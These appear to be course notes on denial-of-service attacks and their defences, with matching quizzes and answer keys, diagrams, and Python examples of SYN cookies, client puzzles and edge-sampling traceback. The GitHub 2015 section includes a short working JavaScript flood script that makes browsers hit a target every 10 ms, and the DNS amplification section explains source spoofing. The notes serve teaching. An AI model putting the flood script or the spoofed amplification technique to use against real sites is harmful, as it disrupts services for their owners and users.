Course Notes-Denial of Service Attacks

1) The first document matches DOS attack classifications (hitlist scanning, random scanning, etc.) with their descriptions. 2) The second document matches spoofing techniques (random spoofing, fixed spoofing, subnet spoofing) with their descriptions. 3) The third document matches DOS attack targets (infrastructure, server applications, network access) with their descriptions.

Uploaded by khalid anjum
Copyright: © All Rights Reserved

DOS Taxonomy: Quiz One

Match the DOS attack classification with its description.

Attacks (answer key: number of the matching description):
  4  Random Scanning
  2  Permutation Scanning
  3  Signpost Scanning
  1  Hitlist Scanning

Descriptions:
  1. A portion of a list of targets is supplied to a compromised computer.
  2. All compromised computers share a common pseudo-random permutation of the IP address space.
  3. Uses the communication patterns of the compromised computer to find new targets.
  4. Each compromised computer probes random addresses.
DOS Taxonomy: Quiz Two

Match the DOS attack classification with its description.

Attacks (answer key: number of the matching description):
  2  Subnet Spoofing
  1  Random Spoofing
  3  Fixed Spoofing

Descriptions:
  1. Generate 32-bit numbers and stamp packets with them.
  2. Generate random addresses within a given address space.
  3. The spoofed address is the address of the target.
DOS Taxonomy: Quiz Three

Match the DOS attack classification with its description.

Attacks (answer key: number of the matching description):
  2  Server Application
  3  Network Access
  1  Infrastructure

Descriptions:
  1. The motivation of this attack is a crucial service of a global internet operation, for example a core router.
  2. The attack is targeted to a specific application on a server.
  3. The attack is used to overload or crash the communication mechanism of a network.
Network DoS:

Goal: take out a large site with little computing

How: amplification. A small number of packets produces a BIG EFFECT.
Network DoS:

Two types of amplification attacks:

- DoS bug: a design flaw allowing one machine to disrupt a service
- DoS flood: command a botnet to generate a flood of requests
Network DoS:

DoS can happen at any layer. Sample DoS at different layers:
- Link
- TCP/UDP
- Application

Sad truth: the current Internet was not designed to handle DDoS attacks.


Amplification Quiz

NTP (Network Time Protocol): used to synchronize machines and their clocks.

Which of these are reasons why the UDP-based NTP protocol is particularly vulnerable to amplification attacks? Select all that are true.

- A small command can generate a large response.
- Vulnerable to source IP spoofing.
- It is difficult to ensure computers communicate only with legitimate NTP servers.
Amplification Example

March 2013 DNS amplification attack (x50 amplification):

  DoS source  --( DNS query, 60 bytes, SrcIP = DoS target )-->  DNS server
  DNS server  --( EDNS response, 3000 bytes )-->  DoS target

The attacker puts the target's address in the source field of a small query; the open resolver's much larger response is delivered to the target, not to the attacker.

- 2006: 0.58M open resolvers on the Internet (Kaminsky-Shiffman)
- 2014: 28M open resolvers (openresolverproject.org)
- March 2013: DDoS attack generating 309 Gbps for 28 mins

IP Header Format

Fields: Version, Header Length, Type of Service, Total Length, Identification, Flags, Fragment Offset, Time to Live, Protocol, Header Checksum, Source Address (of originating host), Destination Address (of target host), Options, Padding, IP Data

Properties of IP: connectionless, unreliable, best effort. The source address is filled in by the sender and is not verified by the network, which is what makes spoofing possible.
TCP Header Format

Fields: Source Port, Dest Port, SEQ Number, ACK Number, flags (URG, ACK, PSH, RST, SYN, FIN), other stuff

Properties of TCP: session based, congestion control, in-order delivery
TCP Handshake

  Client C                                        Server S
                                                  Listening
  SYN:     SN = SNC = randC, AN = 0        -->
                                                  Store SNC, SNS
           <--  SYN/ACK: SN = SNS = randS, AN = SNC + 1
                                                  Wait
  ACK:     SN = SNC + 1, AN = SNS + 1      -->
                                                  Established
TCP SYN Flood I: low rate (DoS Bug)

Single machine sends SYN packets (SYN_C1, SYN_C2, SYN_C3, ...) with random source IP addresses. The server answers each with a SYN/ACK and keeps a half-open entry waiting for an ACK that never arrives, because the spoofed sources did not send the SYN.

- Fills up backlog queue on server
- No further connections possible
TCP SYN Flood I

A classic SYN flood example: MS Blaster worm (2003)

- Infected machines at noon on Aug 16th: SYN flood on port 80 to windowsupdate.com
- 50 SYN packets every second, each packet is 40 bytes
- Spoofed source IP: a.b.X.Y where X, Y random

MS solution: new name, windowsupdate.microsoft.com
TCP SYN Flood I

Low rate SYN flood defenses

- Non-solution: increase backlog queue size or decrease timeout (the attacker only has to send a little faster)
- Correct solution: SYN cookies: remove state from the server, at a small performance overhead
SYN COOKIES

Idea: use a secret key and data in the packet to generate the server's sequence number, so the server does not save state.

Server responds to the client with a SYN-ACK cookie:
  T   = 5-bit counter incremented every 64 secs
  L   = MAC_key(SAddr, SPort, DAddr, DPort, SNC, T)   [24 bits]
  key = picked at random during boot
  SNS = (T . mss . L)   (|L| = 24 bits; T, an encoding of the MSS and L together fill the 32-bit sequence number)

Honest client responds with ACK (AN = SNS + 1, SN = SNC + 1).
Server recomputes L from the ACK's addresses, ports, SN - 1 and the T carried in AN - 1, and allocates space for the socket only if SNS (= AN - 1) is valid.
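The cookie construction above, as an added Python example that is not code from the course notes: make_cookie() builds SNS = T . mss . L for the SYN/ACK and check_ack() validates the handshake's final ACK with nothing stored in between. The slide only says "MAC_key"; HMAC-SHA256 truncated to 24 bits, the eight-entry MSS table behind the 3-bit field, and the acceptance window of two counter ticks are assumptions of this example.

```python
import hashlib
import hmac
import os

# Added example, not from the course notes. Layout of the 32-bit server sequence
# number: T (5 bits) | mss index (3 bits) | L (24 bits), as on the slide.
# Assumed: HMAC-SHA256 truncated to 24 bits as the MAC; the MSS table below.

KEY = os.urandom(16)                                          # picked at random during boot
MSS_TABLE = (536, 1024, 1220, 1440, 1460, 4312, 8960, 9000)  # indexed by the 3-bit mss field
COUNTER_PERIOD = 64                                           # T is incremented every 64 secs
MASK32 = 0xFFFFFFFF


def counter(now: float) -> int:
    """T: 5-bit counter incremented every 64 secs."""
    return (int(now) // COUNTER_PERIOD) & 0x1F


def _mac24(saddr: str, sport: int, daddr: str, dport: int, snc: int, t: int) -> int:
    """L = MAC_key(SAddr, SPort, DAddr, DPort, SNC, T), truncated to 24 bits."""
    msg = f"{saddr}|{sport}|{daddr}|{dport}|{snc}|{t}".encode()
    return int.from_bytes(hmac.new(KEY, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(saddr, sport, daddr, dport, snc, client_mss, now) -> int:
    """Server's initial sequence number for the SYN/ACK. Nothing is stored."""
    t = counter(now)
    usable = [i for i, m in enumerate(MSS_TABLE) if m <= client_mss]
    mss_idx = usable[-1] if usable else 0        # largest table MSS the client accepts
    return (t << 27) | (mss_idx << 24) | _mac24(saddr, sport, daddr, dport, snc, t)


def check_ack(saddr, sport, daddr, dport, seq, ack, now):
    """Validate the final ACK (SN = SNC + 1, AN = SNS + 1).

    Returns the negotiated MSS if the cookie is valid and fresh, else None.
    Everything is recomputed from the packet, so no backlog entry is needed.
    """
    snc = (seq - 1) & MASK32
    sns = (ack - 1) & MASK32
    t = sns >> 27
    mss_idx = (sns >> 24) & 0x7
    tag = sns & 0xFFFFFF
    # accept the current counter value or the previous one (cookie at most ~128 s old)
    if (counter(now) - t) & 0x1F > 1:
        return None
    expected = _mac24(saddr, sport, daddr, dport, snc, t)
    if not hmac.compare_digest(tag.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    snc = 0x12345678
    sns = make_cookie("198.51.100.7", 40000, "192.0.2.10", 80, snc, 1460, now=1000)
    print("SYN/ACK carries SNS =", hex(sns))
    print("valid ACK  ->", check_ack("198.51.100.7", 40000, "192.0.2.10", 80,
                                     (snc + 1) & MASK32, (sns + 1) & MASK32, now=1010))
    print("forged ACK ->", check_ack("198.51.100.7", 40000, "192.0.2.10", 80,
                                     (snc + 1) & MASK32, (sns + 2) & MASK32, now=1010))
```

Two things the slide's quiz hints at are visible here: the only option that survives is what fits in the 3-bit mss field, because the SYN and its options are discarded; and the check costs one MAC per ACK, which is the "small performance overhead".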
SYN Cookies Quiz

Select all the true statements:
- SYN cookies require modified versions of TCP
- SYN cookies lead to overall slower performance
- The server must reject all TCP options because the server discards the SYN queue entry
SYN Floods II: Massive flood

Command bot army to flood specific target (DDoS):
- 20,000 bots can generate 2 Gb/sec of SYNs (2003)

At web site:
- Saturates network uplink or network router
- Random-source-IP attack SYNs look the same as real SYNs
SYN Floods II: Massive flood

Prolexic / CloudFlare

Idea: only forward established TCP connections to site

  Attackers  --( lots of SYNs )-->  Prolexic proxy
  Proxy      --( lots of SYN/ACKs )-->  spoofed sources, which never answer
  Proxy      <--( fewer ACKs )--  real clients only
  Proxy forwards the completed connections to the site
Stronger attacks: TCP connection flood

Command bot army:
- Complete TCP connection to web site
- Send short HTTP HEAD request
- Repeat

Will bypass the SYN flood protection proxy, but:
- Attacker can no longer use random source IPs
- Reveals location of bot zombies
- Proxy can now block or rate-limit bots
A real-world example: GitHub (3/2015)

Javascript-based DDoS: a popular server injects imageFlood.js into the pages it serves to honest end users, and every visitor's browser then floods github.com.

imageFlood.js:

function imgflood() {
  var TARGET = 'victim-website.com/index.php?'
  var rand = Math.floor(Math.random() * 1000)   // random query string defeats caches
  var pic = new Image()
  pic.src = 'http://' + TARGET + rand + '=val'   // assigning src fires the HTTP request
}
setInterval(imgflood, 10)   // one request every 10 ms from each browser running the script
Flood Attack Quiz

With regards to a UDP flood attack, which of the following statements are true:
- Attackers can spoof the IP address of their UDP packets
- The attack can be mitigated using firewalls
- Firewalls cannot stop a flood because the firewall is susceptible to flooding
DoS via route hijacking

[Figure: BGP propagation during the Pakistan Telecom hijack of YouTube]
- AS 36561 (YouTube) announces 208.65.153.0/22
- AS 17557 (Pakistan Telecom) announces the more specific 208.65.153.0/24, which propagates via AS 3491 (PCCW) to AS 3327 (Linx Telecom) and AS 25462 (RETN Ltd) with AS path 3491 17557
- Other networks behind AS 17557: AS 18173 (Allied Bank), Lahore Stock Exchange, AS 58467 (Aga Khan University)
- Includes 210 IP addresses

Routers prefer the longest matching prefix, so once the /24 is accepted, traffic for those YouTube addresses is diverted to Pakistan Telecom.
DoS via route hijacking DETOUR

Timeframe: 100% at 10:30am, 0% at 10:45am

[Figure: 66.174.161.0/24 reached through Level 3, Verizon, Verizon-W. (the legitimate path) and also announced through China Telecom and China Telecom - DC. Legend: Level 3, peer, customer, network traffic.]
DoS at Higher Levels

SSL/TLS handshake [SD'03]:

  Client Hello           -->
                         <--   Server Hello (pub-key)
  Client key exchange    -->   client: RSA encrypt (cheap); server: RSA decrypt (expensive)

The server's RSA private-key operation costs far more CPU than the client's public-key encryption, so a client can tie up the server with cheap handshakes.
DoS Mitigation
Client puzzles

Idea: slow down the attacker with a moderately hard problem:
  Given challenge C, find X such that LSB_n( SHA-1( C || X ) ) = 0^n
  Assumption: takes expected 2^n time to solve
  For n = 16 takes about .3 sec on a 1 GHz machine

Main point: checking a puzzle solution is easy.
DoS Mitigation
Client puzzles

- During DoS attack: everyone must submit a puzzle solution with requests
- When no attack: do not require puzzle solution
DoS Mitigation
Client puzzles: Examples

TCP connection floods (RSA '99)
- Example challenge: C = TCP server-seq-num
- First data packet must contain puzzle solution, otherwise the TCP connection is closed
DoS Mitigation
Client puzzles: Examples

SSL handshake DoS (SD'03)
- Challenge C based on TLS session ID
- Server: check puzzle solution before RSA decrypt

Same for application layer DoS and payment DoS
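The puzzle form from the previous slides and the "challenge derived from something the server already has" pattern of these two examples, as an added Python example that is not code from the course notes. solve() is the client's brute force and verify() the server's single hash; challenge_for() keeps the server stateless by deriving C from the client address and a time window (an assumption standing in for C = TCP server-seq-num or the TLS session ID), and hardness_for() is one assumed policy for picking n from the attack volume.

```python
import hashlib
import hmac
import os

# Added example, not from the course notes. Puzzle: find X with LSB_n(SHA-1(C || X)) = 0^n.
# Assumed: the challenge derivation (HMAC over client id and time window), the
# 60-second window, and the hardness policy.

SERVER_KEY = os.urandom(16)     # assumed: random per boot, never sent to clients
WINDOW = 60                     # assumed: seconds a challenge stays acceptable


def challenge_for(client_id: bytes, now: float) -> bytes:
    """C for this client and window; recomputable later, so nothing is stored."""
    window = int(now) // WINDOW
    return hmac.new(SERVER_KEY, client_id + window.to_bytes(8, "big"), hashlib.sha256).digest()[:16]


def _lsb_zero(digest: bytes, n: int) -> bool:
    return int.from_bytes(digest, "big") & ((1 << n) - 1) == 0


def solve(challenge: bytes, n: int) -> int:
    """Client side: try X = 0, 1, 2, ... until the n low bits of SHA-1(C || X) are zero.
    Expected 2^n hash evaluations."""
    x = 0
    while not _lsb_zero(hashlib.sha1(challenge + x.to_bytes(8, "big")).digest(), n):
        x += 1
    return x


def verify(challenge: bytes, n: int, x: int) -> bool:
    """Server side: one hash, however large n is."""
    return _lsb_zero(hashlib.sha1(challenge + x.to_bytes(8, "big")).digest(), n)


def accept_request(client_id: bytes, n: int, x: int, now: float) -> bool:
    """Stateless check: recompute C for the current and the previous window."""
    for t in (now, now - WINDOW):
        if verify(challenge_for(client_id, t), n, x):
            return True
    return False


def hardness_for(attacker_hashes_per_sec: float, server_capacity_per_sec: float, max_n: int = 20) -> int:
    """Smallest n at which an attacker with a fixed hash budget can no longer
    exceed the server's capacity: at hardness n he sustains at most budget / 2^n
    requests per second. Returns 0 (no puzzle) when there is no overload."""
    n = 0
    while attacker_hashes_per_sec / (2 ** n) > server_capacity_per_sec and n < max_n:
        n += 1
    return n


if __name__ == "__main__":
    client = b"203.0.113.9"                       # constructed client address
    n = hardness_for(attacker_hashes_per_sec=2 ** 20, server_capacity_per_sec=2 ** 8)
    c = challenge_for(client, now=1_700_000_000)
    x = solve(c, n)
    print(f"n={n} X={x} accepted={accept_request(client, n, x, now=1_700_000_000)}")
```

The asymmetry the slide calls the main point is the whole design: solve() loops about 2^n times, verify() runs once, and the server keeps no record of which challenges it handed out because it can recompute them.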


DoS Mitigation
Client puzzles: Benefits and limitations

Hardness of challenge: n, decided based on DoS attack volume

Limitations:
- Requires changes to both clients and servers
- Hurts low power legitimate clients during attack: clients on cell phones and tablets cannot connect
DoS Mitigation
Client puzzles: Memory-bound functions

CPU power ratio: high end server / low end cell phone = 8000
  Impossible to scale to hard puzzles: any n that slows a server-class attacker locks out the phone.

Interesting observation: main memory access time ratio: high end server / low end cell phone = 2
DoS Mitigation
Better puzzles

Solution requires many main memory accesses:
- Dwork-Goldberg-Naor, Crypto '03
- Abadi-Burrows-Manasse-Wobber, ACM ToIT '05


Puzzle Quiz

Which of the following statements are true?
- Client puzzles should be hard to construct. This is an indication of the level of difficulty to solve them.
- Client puzzles should be stateless
- Puzzle complexity should increase as the strength of the attack increases.
DoS Mitigation - CAPTCHAs

CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

Idea: verify that the connection is from a human ("Are you human?")

Applies to application layer DDoS [Killbots '05]:
- During attack: generate CAPTCHAs and process a request only if it carries a valid solution
- Present one CAPTCHA per source IP address
DoS Mitigation: Source Identification

Goal: identify packet source

Ultimate goal: block attack at the source


DoS Mitigation: Source Identification
Ingress Filtering

[Figure: customer network 204.69.207.0/24 attached to its ISP, which connects to the Internet]

At the ISP's edge: drop all packets with a source address other than 204.69.207.0/24

Ingress filtering policy: the ISP only forwards packets whose source IP legitimately belongs to the network they arrive from.
DoS Mitigation: Source Identification
Ingress Filtering - Implementation problems

- ALL ISPs must do this. Requires global trust.
- If 10% of ISPs do not implement it, there is no defense. Recall: the 309 Gbps attack (3/2013) used only 3 networks.
- No incentive for deployment
- 2014: 25% of Autonomous Systems are fully spoofable (spoofer.cmand.org); 13% of announced IP address space is spoofable
DoS Mitigation: Traceback
Traceback [Savage et al. '00]

Goal: given a set of attack packets, determine the path to the source
How: change routers to record info in packets

Assumptions:
- Most routers remain uncompromised
- Attacker sends many packets
- Route from attacker to victim remains relatively stable
DoS Mitigation: Traceback
Simple Method:

Write path into network packet:
- Each router adds its own IP address to the packet
- Victim reads path from packet

Problems:
- Requires space in packet
- Path can be long
- No extra fields in current IP format
- Changes to packet format too much to expect
DoS Mitigation: Traceback
Better Idea

DDoS involves many packets on the same path, so store one link in each packet:
- Each router probabilistically stores its own address
- Fixed space regardless of path length
Traceback Quiz

Which of the following are assumptions that can be made about Traceback?
- Attackers can generate limited types of packets
- Attackers may work alone or in groups
- Attackers are not aware of the tracing mechanism
DoS Mitigation: Edge Sampling

Data fields written to packet:
- Edge: start and end IP addresses
- Distance: number of hops since edge stored
DoS Mitigation: Edge Sampling
Marking procedure for router R:

  if coin turns up heads (with probability p) then
      write R into start address
      write 0 into distance field
  else
      if distance == 0 write R into end field
      increment distance field
DoS Mitigation: Edge Sampling

Packet received: R1 receives a packet from the source or another router. The packet contains space for start, end, distance.
  Packet [ s | e | d ]        R1 -> R2 -> R3

Begin writing edge: R1 chooses to write the start of an edge and sets distance to 0.
  Packet [ R1 | - | 0 ]

Finish writing edge: R2 chooses not to overwrite the edge; distance is 0, so it writes the end of the edge and increments distance to 1.
  Packet [ R1 | R2 | 1 ]

Increment distance: R3 chooses not to overwrite the edge; distance > 0, so it only increments distance to 2.
  Packet [ R1 | R2 | 2 ]

Path reconstruction:
- Extract information from attack packets
- Build graph rooted at victim
- Each (start, end, distance) tuple provides an edge

Number of packets needed to reconstruct the path:

  E(X) < ln(d) / ( p (1 - p)^(d-1) )

where p is the marking probability and d is the length of the path.
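The marking procedure and the victim-side reconstruction above, as an added Python simulation that is not code from the course notes. Router names, the two attack paths, the victim label "V" and the bogus values the attacker preloads into the marking fields are constructed for the example; mark() is the slide's procedure verbatim, and expected_packets_bound() is the bound just stated.

```python
import math
import random

# Added example, not from the course notes: probabilistic edge sampling
# (Savage et al. '00) with the slide's marking procedure and a victim that
# rebuilds the attack tree from (start, end, distance) tuples.
# Constructed: router names, paths, the victim label, the attacker's preloaded fields.

VICTIM = "V"


def mark(router: str, pkt: dict, p: float, rng: random.Random) -> None:
    """Marking procedure for router R, as on the slide."""
    if rng.random() < p:             # coin turns up heads (probability p)
        pkt["start"] = router        # write R into start address
        pkt["end"] = None
        pkt["distance"] = 0          # write 0 into distance field
    else:
        if pkt["distance"] == 0:     # previous hop just started an edge
            pkt["end"] = router      # write R into end field
        pkt["distance"] += 1         # increment distance field


def send(path: list, n: int, p: float, rng: random.Random) -> list:
    """Send n packets from an attacker along `path` (attacker side first) to the victim.
    The attacker controls the initial field values, so a forged edge is preloaded."""
    received = []
    for _ in range(n):
        pkt = {"start": "FAKE", "end": "FAKE", "distance": 0}
        for router in path:
            mark(router, pkt, p, rng)
        received.append(pkt)
    return received


def reconstruct(packets: list) -> list:
    """Victim side: build the tree rooted at the victim, return every root-to-leaf path.
    A packet arriving with distance 0 was marked by the last router, so its end is the victim."""
    edges = set()
    for pkt in packets:
        end = VICTIM if pkt["distance"] == 0 else pkt["end"]
        edges.add((pkt["start"], end, pkt["distance"]))

    paths = []

    def walk(node, depth, so_far):
        # an edge (s, node, depth) places s one hop further from the victim than node
        nexts = sorted({s for (s, e, d) in edges if e == node and d == depth})
        if not nexts:
            paths.append(so_far)
        for s in nexts:
            walk(s, depth + 1, so_far + [s])

    walk(VICTIM, 0, [VICTIM])
    return paths


def expected_packets_bound(p: float, d: int) -> float:
    """E(X) < ln(d) / (p (1-p)^(d-1)): packets needed to see every edge of a path of length d."""
    return math.log(d) / (p * (1 - p) ** (d - 1))


def simulate(attack_paths: list, n: int, p: float, seed: int = 7) -> list:
    """Run n packets over each attack path with a seeded RNG and reconstruct at the victim."""
    rng = random.Random(seed)
    packets = []
    for path in attack_paths:
        packets += send(path, n, p, rng)
    return reconstruct(packets)


if __name__ == "__main__":
    # two attackers behind the same last two routers; R2 is where the reverse paths split
    for route in simulate([["A1", "R2", "R3"], ["B1", "R2", "R3"]], n=300, p=0.2):
        print(" -> ".join(route))
    print("bound for d=3, p=0.2:", round(expected_packets_bound(0.2, 3), 2))
```

The preloaded "FAKE" edge shows the limit on what an attacker can forge: every router increments the distance field, so a forged edge arrives with distance equal to the full path length and shows up only beyond the true path, never closer to the victim than the real routers.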
Edge Sampling Quiz

Select all the statements that are true for edge sampling:
- Multiple attackers can be identified since the edge identifies splits in the reverse path
- It is difficult for victims to reconstruct a path to the attacker
- Requires space in the IP packet header
Reflector Attack [Paxson '01]

1. Attacker spoofs the Victim's IP and sends a DNS query to many DNS servers
2. All DNS servers respond to the DNS query and send data to the Victim's IP
3. Victim is flooded by all of the data sent from the DNS servers
Reflector Attack [Paxson '01]

Examples:
- DNS resolvers: UDP 53 with victim.com source; at victim: DNS response
- Web servers: TCP SYN 80 with victim.com source; at victim: TCP SYN ACK packet
- Gnutella servers
Reflector Attack [Paxson '01]

  Request: src = victim,    dst = reflector
  Reply:   src = reflector, dst = victim

[Figure: the MASTER sends control traffic that directs slaves at the reflectors; the reflectors send streams of non-spoofed but unsolicited traffic to the VICTIM]
Reflector Attack Quiz

Self defense against reflector attacks should incorporate:
- Filtering: filter DNS traffic as close to the victim as possible.
- Server redundancy: servers should be located in multiple networks and locations.
- Traffic limiting: traffic from a name server should be limited to reasonable thresholds.
Capability Based Defense

- Anderson, Roscoe, Wetherall. Preventing internet denial-of-service with capabilities. SIGCOMM '04.
- Yaar, Perrig, Song. SIFF: A stateless internet flow filter to mitigate DDoS flooding attacks. IEEE S&P '04.
- Yang, Wetherall, Anderson. A DoS-limiting network architecture. SIGCOMM '05.
Capability Based Defense

Basic idea: receivers can specify what packets they want

How:
- Sender requests a capability in the SYN packet; a path identifier is used to limit the number of requests from one source
- Receiver responds with the capability
- Sender includes the capability in all future packets
Capability Based Defense

Main point: routers only forward
- request packets, and
- packets with a valid capability

Capabilities can be revoked if the source is attacking, which blocks attack packets close to the source.

[Figure: Source -> R1 -> R2 -> R3 -> R4 -> DEST, spanning the source AS, a transit AS and the destination AS]
DoS Summary

- Denial of Service attacks are real. They must be considered at design time.
- Sad truth: the Internet is ill-equipped to handle DDoS attacks.
- Commercial solutions: CloudFlare, Prolexic
- Many good proposals for Internet core redesign.
